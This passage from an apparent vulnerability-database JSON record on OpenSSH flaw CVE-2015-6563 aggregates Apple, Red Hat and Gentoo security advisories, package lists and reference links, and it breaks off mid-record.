Jonathan Schleifer\n\nMCX Application Restrictions\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: A developer-signed executable may acquire restricted\nentitlements\nDescription: An entitlement validation issue existed in Managed\nConfiguration. A developer-signed app could bypass restrictions on\nuse of restricted entitlements and elevate privileges. This issue was\naddressed through improved provisioning profile validation. \nCVE-ID\nCVE-2015-7016 : Apple\n\nNet-SNMP\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker in a privileged network position may be able to\ncause a denial of service\nDescription: Multiple issues existed in netsnmp version 5.6. These\nissues were addressed by using patches affecting OS X from upstream. \nCVE-ID\nCVE-2012-6151\nCVE-2014-3565\n\nOpenGL\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in OpenGL. This issue\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-5924 : Apple\n\nOpenSSH\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to conduct impersonation attacks\nDescription: A privilege separation issue existed in PAM support. \nThis issue was addressed with improved authorization checks. \nCVE-ID\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\n\nSandbox\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: An input validation issue existed when handling NVRAM\nparameters. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\nInstitute, Apple\n\nScript Editor\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker may trick a user into running arbitrary\nAppleScript\nDescription: In some circumstances, Script Editor did not ask for\nuser confirmation before executing AppleScripts. This issue was\naddressed by prompting for user confirmation before executing\nAppleScripts. \nCVE-ID\nCVE-2015-7007 : Joe Vennix of Rapid7\n\nSecurity\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: A double free issue existed in the handling of\nAtomicBufferedFile descriptors. This issue was addressed through\nimproved validation of AtomicBufferedFile descriptors. \nCVE-ID\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\nUlanov from the Chrome Team\n\nSecurityAgent\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application can programmatically control\nkeychain access prompts\nDescription: A method existed for applications to create synthetic\nclicks on keychain prompts. This was addressed by disabling synthetic\nclicks for keychain access windows. \nCVE-ID\nCVE-2015-5943\n\nInstallation note:\n\nOS X El Capitan v10.11.1 includes the security content of\nSafari 9.0.1: https://support.apple.com/kb/HT205377\n\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJWJuKsAAoJEBcWfLTuOo7t8e0P/igVHKDXeLNib2eEzbS2BMVV\nEe968BgEDw1xnHK8zzh3bbRNxxAUT9lwe8RuSYECfp8sUYySb51/VIWpmidewsqB\naz7mJ4Gohldppejc5tykHDoTYesQL7iySLn74PdxZfZXbtz2EGJK19cA6hIHcO5x\nZiMCbJzTaAOylKRQRRi3kMdNWEzxbtm90247vNx/zMSjs1bhGlQbJsCVDmX/Q9uH\nXja9aPCHDfaQueTw5idbXwT+Y/+I9ytBlL5JXVrjRUDYCtuewC4DNsQxZY0qcDyE\nA7/0G7iYW5vOECNhpoLA0+1MbdHxJXhwJtmIKX8zucYqe/Vr4j41oGey/HJW55ER\nUSJ2RBpMtGhDEolyvxz7FlSPYOIpp05mwMB0GWQWAmkWDAxnagkQm9xwKBMt4eq4\nCNdI0YaX0iPPWYIkI3HpZHdzuwbE5b053cw1hLKc0OVQBiqLUQxe3W5s64ZqTSe0\nwhlm9lt/9EUwyfXHEiXTYi/d+CF8+JthY4ieXRJ4mwz77udafmgA5Pbl71SqB8pE\n7TBByuCOFdou6JmdJPahLDxoGRA+i7Z+a8Myn4WtbemkjrO9iZ/VsdAdl/Db+7cz\nrEgSPjelEC5z5WxQspiuohxU1NkDnMgWm2Tnx+pFBOfZMheE4xnTfve3vqY+gQdN\n4GbuRXld4PbxeDdel0Nk\n=snJ4\n-----END PGP SIGNATURE-----\n. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* It was found that the OpenSSH client did not properly enforce the\nForwardX11Timeout setting. A malicious or compromised remote X application\ncould possibly use this flaw to establish a trusted connection to the local\nX server, even if only untrusted X11 forwarding was requested. (CVE-2015-6564)\n\n* An access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2088-06\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2088.html\nIssue date: 2015-11-19\nCVE Names: CVE-2015-5600 CVE-2015-6563 CVE-2015-6564 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix multiple security issues, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. These\npackages include the core files necessary for both the OpenSSH client and\nserver. \n\nA flaw was found in the way OpenSSH handled PAM authentication when using\nprivilege separation. An attacker with valid credentials on the system and\nable to fully compromise a non-privileged pre-authentication process using\na different flaw could use this flaw to authenticate as other users. \n(CVE-2015-6563)\n\nA use-after-free flaw was found in OpenSSH. (CVE-2015-6564)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nIt was found that the OpenSSH ssh-agent, a program to hold private keys\nused for public key authentication, was vulnerable to password guessing\nattacks. An attacker able to connect to the agent could use this flaw to\nconduct a brute-force attack to unlock keys in the ssh-agent. (BZ#1238238)\n\nThis update fixes the following bugs:\n\n* Previously, the sshd_config(5) man page was misleading and could thus\nconfuse the user. This update improves the man page text to clearly\ndescribe the AllowGroups feature. (BZ#1150007)\n\n* The limit for the function for restricting the number of files listed\nusing the wildcard character (*) that prevents the Denial of Service (DoS)\nfor both server and client was previously set too low. Consequently, the\nuser reaching the limit was prevented from listing a directory with a large\nnumber of files over Secure File Transfer Protocol (SFTP). This update\nincreases the aforementioned limit, thus fixing this bug. (BZ#1160377)\n\n* When the ForceCommand option with a pseudoterminal was used and the\nMaxSession option was set to \"2\", multiplexed SSH connections did not work\nas expected. After the user attempted to open a second multiplexed\nconnection, the attempt failed if the first connection was still open. This\nupdate modifies OpenSSH to issue only one audit message per session, and\nthe user is thus able to open two multiplexed connections in this\nsituation. (BZ#1199112)\n\n* The ssh-copy-id utility failed if the account on the remote server did\nnot use an sh-like shell. Remote commands have been modified to run in an\nsh-like shell, and ssh-copy-id now works also with non-sh-like shells. \n(BZ#1201758)\n\n* Due to a race condition between auditing messages and answers when using\nControlMaster multiplexing, one session in the shared connection randomly\nand unexpectedly exited the connection. This update fixes the race\ncondition in the auditing code, and multiplexing connections now work as\nexpected even with a number of sessions created at once. (BZ#1240613)\n\nIn addition, this update adds the following enhancements:\n\n* As not all Lightweight Directory Access Protocol (LDAP) servers possess\na default schema, as expected by the ssh-ldap-helper program, this update\nprovides the user with an ability to adjust the LDAP query to get public\nkeys from servers with a different schema, while the default functionality\nstays untouched. (BZ#1201753)\n\n* With this enhancement update, the administrator is able to set\npermissions for files uploaded using Secure File Transfer Protocol (SFTP). \n(BZ#1197989)\n\n* This update provides the LDAP schema in LDAP Data Interchange Format\n(LDIF) format as a complement to the old schema previously accepted\nby OpenLDAP. (BZ#1184938)\n\n* With this update, the user can selectively disable the Generic Security\nServices API (GSSAPI) key exchange algorithms as any normal key exchange. \n(BZ#1253062)\n\nUsers of openssh are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1125110 - pam_namespace usage is not consistent across system-wide PAM configuration\n1160377 - sftp is failing using wildcards and many files\n1178116 - Default selinux policy prevents ssh-ldap-helper from connecting to LDAP server\n1181591 - No Documentation= line in the sshd.service file\n1184938 - Provide LDIF version of LPK schema\n1187597 - sshd -T does not show all (default) options, inconsistency\n1197666 - ssh client using HostbasedAuthentication aborts in FIPS mode\n1197989 - RFE: option to let openssh/sftp force the exact permissions on newly uploaded files\n1238238 - openssh: weakness of agent locking (ssh-add -x) to password guessing\n1245969 - CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices\n1252844 - CVE-2015-6563 openssh: Privilege separation weakness related to PAM support\n1252852 - CVE-2015-6564 openssh: Use-after-free bug related to PAM support\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\naarch64:\nopenssh-6.6.1p1-22.el7.aarch64.rpm\nopenssh-clients-6.6.1p1-22.el7.aarch64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm\nopenssh-keycat-6.6.1p1-22.el7.aarch64.rpm\nopenssh-server-6.6.1p1-22.el7.aarch64.rpm\n\nppc64:\nopenssh-6.6.1p1-22.el7.ppc64.rpm\nopenssh-askpass-6.6.1p1-22.el7.ppc64.rpm\nopenssh-clients-6.6.1p1-22.el7.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm\nopenssh-keycat-6.6.1p1-22.el7.ppc64.rpm\nopenssh-server-6.6.1p1-22.el7.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-askpass-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-clients-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-keycat-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-server-6.6.1p1-22.el7.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-22.el7.s390x.rpm\nopenssh-askpass-6.6.1p1-22.el7.s390x.rpm\nopenssh-clients-6.6.1p1-22.el7.s390x.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.s390x.rpm\nopenssh-keycat-6.6.1p1-22.el7.s390x.rpm\nopenssh-server-6.6.1p1-22.el7.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssh-askpass-6.6.1p1-22.el7.aarch64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm\nopenssh-ldap-6.6.1p1-22.el7.aarch64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.aarch64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.aarch64.rpm\n\nppc64:\nopenssh-debuginfo-6.6.1p1-22.el7.ppc.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm\nopenssh-ldap-6.6.1p1-22.el7.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-ldap-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-22.el7.s390.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.s390x.rpm\nopenssh-ldap-6.6.1p1-22.el7.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.s390.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5600\nhttps://access.redhat.com/security/cve/CVE-2015-6563\nhttps://access.redhat.com/security/cve/CVE-2015-6564\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWTj/BXlSAg2UNWIIRAgIEAJ4+Nlu4NsYtiDloNVrVn2F/vT/9kACdEHqE\nh3XwDOy3+OSs/h1DEpVBtV0=\n=x/s+\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201512-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSH: Multiple vulnerabilities\n Date: December 20, 2015\n Bugs: #553724, #555518, #557340\n ID: 201512-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSH, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\n\n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-6.9_p1-r2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352\n[ 2 ] CVE-2015-5600\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600\n[ 3 ] CVE-2015-6563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563\n[ 4 ] CVE-2015-6564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564\n[ 5 ] CVE-2015-6565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201512-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "BID", "id": "76317" }, { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-6563", "trust": 3.3 }, { "db": "BID", "id": "76317", "trust": 2.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/08/22/1", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU92655282", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-004403", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201508-504", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201508-115", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-84524", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-6563", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134055", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136959", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134475", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135009", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "id": "VAR-201508-0112", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-84524" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:26:42.941000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/oct/msg00005.html" }, { "title": "HT205375", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205375" }, { "title": "HT205375", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht205375" }, { "title": "Don\u0027t resend username to PAM; it already has it.", "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b" }, { "title": "release-7.0", "trust": 0.8, "url": "http://www.openssh.com/txt/release-7.0" }, { "title": "OpenSSH sshd monitor Fixes for component input validation vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=90847" }, { "title": "Red Hat: Moderate: openssh security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152088 - security advisory" }, { "title": "Red Hat: CVE-2015-6563", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-6563" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-6563 CVE-2015-6564", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=73eb91ff53511af2767cd29878bd74dc" }, { "title": "Amazon Linux AMI: ALAS-2015-592", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-592" }, { "title": "Amazon Linux AMI: ALAS-2015-625", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-625" }, { "title": "Symantec Security Advisories: SA104 : OpenSSH Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b643e473a764678a8d1ded300d5699b6" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "manual-detection", "trust": 0.1, "url": "https://github.com/cycognito/manual-detection " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "http://www.securityfocus.com/bid/76317" }, { "trust": 2.1, "url": "http://www.openssh.com/txt/release-7.0" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 2.1, "url": "https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201512-04" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2016-0741.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2015/oct/msg00005.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20180201-0002/" }, { "trust": 1.8, "url": "https://support.apple.com/ht205375" }, { "trust": 1.8, "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-766" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/165170.html" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2015/aug/54" }, { "trust": 1.8, "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2015/08/22/1" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00017.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6563" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu92655282/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6563" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6563" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-6563" }, { "trust": 0.3, "url": "https://github.com/openssh/openssh-portable/commit/5e75f5198769056089fb06c4d738ab0e5abc66f7 " }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory6.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024087" }, { "trust": 0.3, "url": 